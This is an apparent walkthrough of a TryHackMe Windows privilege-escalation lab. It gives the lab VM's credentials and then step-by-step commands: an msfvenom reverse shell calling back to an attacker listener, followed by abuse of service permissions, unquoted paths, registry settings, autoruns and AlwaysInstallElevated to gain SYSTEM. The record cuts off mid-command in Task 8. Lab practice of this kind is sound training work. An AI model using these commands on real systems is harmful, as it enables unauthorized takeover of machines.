Practice your skills with this TryhackMe Windows PrivEsc on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

Windows PrivEsc v1.0 windows10privesc

Task 1 – Deploy the Machine

IP: 10.10.187.249

User: user

Password: password321

Protocol: RDP

xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.187.249

Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Windows VM!

Task2 – Generate a Reverse Shell Executable

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe

sudo nc -nvlp 53

Send generated reverse shell into Windows system

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe

C:\PrivEsc\reverse.exe

Task3 – Service Exploits – Insecure Service Permissions

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

sc qc daclsvc

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

net start daclsvc

What is the original BINARY_PATH_NAME of the daclsvc service?

C:\Program Files\DACL Service\daclservice.exe

Task4 – Service Exploits – Unquoted Service Path

sc qc unquotedsvc

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

net start unquotedsvc

What is the BINARY_PATH_NAME of the unquotedsvc service?

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Task 5 – Service Exploits – Weak Registry Permissions

sc qc regsvc

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

net start regsvc

Task 6 – Service Exploits – Insecure Service Executables

sc qc filepermsvc

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

net start filepermsvc

Task 7 – Registry – AutoRuns

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

rdesktop 10.10.187.249

TAsk 8 – Registry – AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o revers